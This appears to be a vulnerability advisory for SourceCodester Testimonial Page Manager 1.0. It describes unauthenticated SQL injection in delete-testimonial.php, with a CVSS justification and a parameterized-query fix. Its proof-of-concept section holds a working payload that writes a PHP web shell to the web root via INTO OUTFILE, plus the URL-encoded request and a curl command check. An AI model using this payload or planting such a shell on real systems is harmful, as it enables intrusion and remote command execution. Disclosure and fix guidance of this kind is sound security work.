| Title | Sourcecodester Testimonial Page Manager 1.0 SQLi leading to RCE |
|---|---|
| Description | ## Summary
Parameters in `delete-testimonial.php` are not sanitized before being used to directly construct a SQL query. In standard installations, a malicious user can use this to write malicious PHP code to a file accessible from the web root, leading to remote code execution.
## Issue Description
SQL injection (SQLi) is a code injection technique used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution. This particular SQLi vulnerability can allow attackers to gain remote code execution over the affected resource.
Note: There is no authentication required to use this software. The entry point for this vulnerability is `delete-testimonial.php`. This endpoint takes the input values and submits them to the backend SQL database without sanitizing or parameterizing the input values.
`delete-testimonial.php` lines 4-8:
```php
if (isset($_GET['testimony'])) {
    $testimony = $_GET['testimony'];   // raw query-string value, never validated
    try {
        // user input is interpolated straight into the statement text
        $query = "DELETE FROM tbl_testimony WHERE tbl_testimony_id = '$testimony'";
        ...
}
```
Direct concatenation of user input without sanitization leads to SQL injection.
## Affected URL/Area
`delete-testimonial.php`
## Risk Rating
- Risk: **HIGH**
- Exploitation Difficulty: **LOW**
## CVSS Justification
### Network - AV
The vulnerable component is bound to the network stack. The set of possible attackers extends beyond local attacks, up to and including the entire Internet.
### Low - AC
Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success when attacking the vulnerable component.
### None - PR
The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.
### None - UI
The vulnerable system can be exploited without interaction from any user.
### Changed - S
An exploited vulnerability can affect resources beyond the security scope managed by the security authority of the vulnerable component.
### High - C
There is a total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker.
### High - I
There is a total loss of data integrity.
### High - A
There is a total loss of availability.
## Steps to reproduce
POC:
Attack string, places a file called `rce.php` at the web root:
```
'; SELECT '<?php $command = $_GET[\'cmd\'];$result = shell_exec($command);echo "<pre>$result</pre>";?>' INTO OUTFILE 'C:\\xampp\\htdocs\\rce.php'; -- ''
```
URL encoded request:
```
GET /testimonial-page-manager/endpoint/delete-testimony.php?testimony=%27%3b%20%53%45%4c%45%43%54%20%27%3c%3f%70%68%70%20%24%63%6f%6d%6d%61%6e%64%20%3d%20%24%5f%47%45%54%5b%5c%27%63%6d%64%5c%27%5d%3b%24%72%65%73%75%6c%74%20%3d%20%73%68%65%6c%6c%5f%65%78%65%63%28%24%63%6f%6d%6d%61%6e%64%29%3b%65%63%68%6f%20%22%3c%70%72%65%3e%24%72%65%73%75%6c%74%3c%2f%70%72%65%3e%22%3b%3f%3e%27%20%49%4e%54%4f%20%4f%55%54%46%49%4c%45%20%27%43%3a%5c%5c%78%61%6d%70%70%5c%5c%68%74%64%6f%63%73%5c%5c%72%63%65%2e%70%68%70%27%3b%20%2d%2d%20%27%27
HTTP/1.1
```
Send this with a repeater of your choice. This payload enables RCE with the permissions of the user who started the SQL server process.
Check RCE:
```
$ curl http://localhost/rce.php?cmd=time
The current time is: 21:33:42.85
Enter the new time:
```
## Recommended Fix
Use parameterized (prepared) queries instead of concatenating user input into SQL text, and audit software thoroughly before publishing.
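A hardened rewrite of the `delete-testimonial.php` excerpt, added here as an illustration and not taken from the project. It assumes a PDO connection in `$pdo` (the original snippet shows a `try` block but not how the database handle is created); the DSN and credentials are placeholders.

```php
<?php
// Added example: parameterized replacement for the vulnerable DELETE in
// delete-testimonial.php. Assumes a PDO handle in $pdo (not shown on the page).
declare(strict_types=1);

function deleteTestimony(PDO $pdo, string $rawId): bool
{
    // 1. Validate the shape first: tbl_testimony_id holds integers, so a value
    //    containing a quote, semicolon or keyword is rejected before any SQL
    //    is built. This alone defeats the "'; SELECT ... INTO OUTFILE" string.
    if (!preg_match('/^\d{1,10}$/', $rawId)) {
        return false;
    }

    // 2. Parameterize: the id is sent to the server as a bound value, not as
    //    part of the statement text, so it can never close the string literal
    //    or append a second statement.
    $stmt = $pdo->prepare(
        'DELETE FROM tbl_testimony WHERE tbl_testimony_id = :id'
    );
    $stmt->bindValue(':id', (int) $rawId, PDO::PARAM_INT);
    $stmt->execute();

    return $stmt->rowCount() === 1;
}

// 3. Use server-side prepared statements so the driver never interpolates
//    bound values into SQL text on the client. DSN/credentials are placeholders.
//    Defense in depth (outside this file): run the app with a MySQL account that
//    lacks the FILE privilege, which INTO OUTFILE requires.
$pdo = new PDO(
    'mysql:host=localhost;dbname=PLACEHOLDER_DB;charset=utf8mb4',
    'PLACEHOLDER_USER',
    'PLACEHOLDER_PASSWORD',
    [
        PDO::ATTR_EMULATE_PREPARES => false,
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    ]
);

if (isset($_GET['testimony'])) {
    $ok = deleteTestimony($pdo, (string) $_GET['testimony']);
    http_response_code($ok ? 200 : 400);
}
```

With this version the original attack string fails the integer check and returns HTTP 400 without touching the database; even a valid-looking id reaches MySQL only as a bound parameter.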
## References
https://cwe.mitre.org/data/definitions/89.html
https://owasp.org/www-community/attacks/SQL_Injection
https://www.rapid7.com/fundamentals/sql-injection-attacks/
https://en.wikipedia.org/wiki/SQL_injection
https://brightsec.com/blog/sql-injection-attack/
## Notes
Please credit Michael Blunt as the discovering researcher. |
| User | mikel22 (UID 51822) |
| Submitted | 2024. 02. 01. AM 04:10 (2 years ago) |
| Moderation | 2024. 02. 02. AM 08:47 (1 day later) |
| Status | Accepted |
| VulDB Entry | 252695 [SourceCodester Testimonial Page Manager 1.0 HTTP GET Request delete-testimonial.php testimony SQL injection] |
| Points | 17 |